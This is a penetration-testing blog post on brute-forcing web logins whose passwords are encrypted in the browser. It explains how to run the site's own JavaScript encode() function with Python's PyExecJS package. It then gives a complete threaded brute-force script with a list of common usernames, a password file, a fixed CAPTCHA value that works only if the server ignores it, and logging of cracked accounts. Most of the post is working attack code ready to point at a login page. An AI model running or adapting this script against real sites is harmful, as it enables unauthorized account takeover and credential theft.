
Bypassing front-end encryption for brute-forcing (script included)

During a penetration test you sometimes find that the password is encrypted on the front end before it is submitted, which makes brute-forcing harder. The encryption is done by a custom function in the page's own JS, so the encoding and hashing functions built into Burp do not cover it. In the example below the password is admin123 and the request carries its encrypted form:

(screenshot: the login request with the encrypted form of admin123)

The encryption is done mainly by the function encode, so every password goes through this custom function before it reaches the server.

(screenshot: the page's encode function)

In a recent engagement I picked up a new trick: execute that JS file with a suitable tool or module and take its output. Because the script is delivered to every client, nothing stops us from calling the same function ourselves; the PyExecJS package for Python (imported as execjs) does exactly this.

Installation

First install PyExecJS:
pip install PyExecJS

PyExecJS only drives an external JavaScript runtime, so Node.js (or PhantomJS, which the first script below names explicitly) must also be installed; execjs.get() with no argument picks whichever runtime it finds.

Save the page's JS code locally (as test.js below).

#coding:utf-8
import execjs

# Load the page's JS (saved as test.js) into a JS runtime and call its
# encode() exactly as the browser would.
with open('test.js', 'r') as jj:
    source = jj.read()

phantom = execjs.get('PhantomJS')   # or execjs.get() to use whatever runtime is installed, e.g. Node
getpass = phantom.compile(source)
# The function name must match the one defined in the site's JS (encode here)
mypass = getpass.call('encode', 'admin', 'admin123')
print(mypass)

With the code above you obtain the encrypted form of the password, identical to what the browser would submit.

Brute-forcing

Time to automate it: a Python script that performs the brute-force.

#coding=utf-8
import threading
from concurrent.futures import ThreadPoolExecutor

import execjs
import requests

URL = 'http://xxx/login'
UA = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0"

# Compile the site's JS once; re-compiling it for every attempt was the
# bottleneck of the first version of this script.
with open('test.js', 'r') as jj:
    source = jj.read()
getpass = execjs.get().compile(source)   # execjs.get('PhantomJS') to pin a runtime
write_lock = threading.Lock()


def brute(user, password):
    # Encrypt the candidate exactly as the page's encode() does
    passwd = getpass.call('encode', user, password)
    print(user, password, passwd)
    post_data = {
        'userName': user,
        'userPass': passwd,
        'verifyCode': 'dsvx',   # fixed value as in the original; only works if the server does not check it
    }
    headers = {
        "User-Agent": UA,
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "Referer": "http://xxx/",
        "Connection": "close",
    }
    resp = requests.post(url=URL, data=post_data, headers=headers)
    print(user + "#" + password + " " + resp.text)
    # The failure page carries this string; its absence is taken as a hit.
    # (Testing find() > 0, as the original did, also fires when the string is at offset 0.)
    if '請檢查賬號和密碼' not in resp.text:
        print('*** find user:', user, 'with password:', password, '***')
        with write_lock, open('accounts-cracked.txt', 'a+') as f:
            f.write(user + ' ' + password + ' ' + passwd + '\n')


def main():
    user_list = ['admin', 'noreply', 'hr', 'jobs', 'qiniu', 'lietou', 'demo', 'ceo', 'dev', 'root',
                 'service', 'fuwu', 'yunying', 'webmaster', 'wechat', 'weixin', 'weibo', 'tec', 'bd',
                 'bf', 'op', 'shop', 'test', 'pm', 'kefu', 'cdn', 'marketing', 'zhaopin', 'suggestion',
                 'warning', 'risk', 'system', 'pay', 'payment', 'management', 'feedback', 'guanli',
                 'ci', 'ad', 'td', 'news', 'cert', 'sdk', 'pmd', 'appstore', 'development', 'it',
                 'fankui', 'notify', 'bugs', 'security', 'sec', 'alipay', 'yunwei', 'message',
                 'support', 'ceshi', 'developer', 'notice', 'redmine', 'alert', 'kaifa', 'seo', 'git',
                 'vpn', 'jenkins', 'jira', 'zabbix', 'chandao', 'nagios', 'monitor', 'account',
                 'jubao', 'backup', 'open', 'openapi', 'github', 'reload', 'blacklist', 'buyer',
                 'caiwu', 'order', 'postmaster', 'pr', 'report', 'public', 'download', 'som', 'ops',
                 'devops', 'caigou', 'pmp', 'monit']
    with open('pass2.txt', 'r') as f1:
        passwords = [line.strip() for line in f1 if line.strip()]
    # The first version started and immediately joined each thread, i.e. it ran
    # serially; a small pool gives real concurrency while bounding the request rate.
    with ThreadPoolExecutor(max_workers=10) as pool:
        for password in passwords:
            for user in user_list:
                pool.submit(brute, user, password)


if __name__ == '__main__':
    main()

Result screenshot: (image omitted)

Reference:
https://segmentfault.com/a/1190000010179232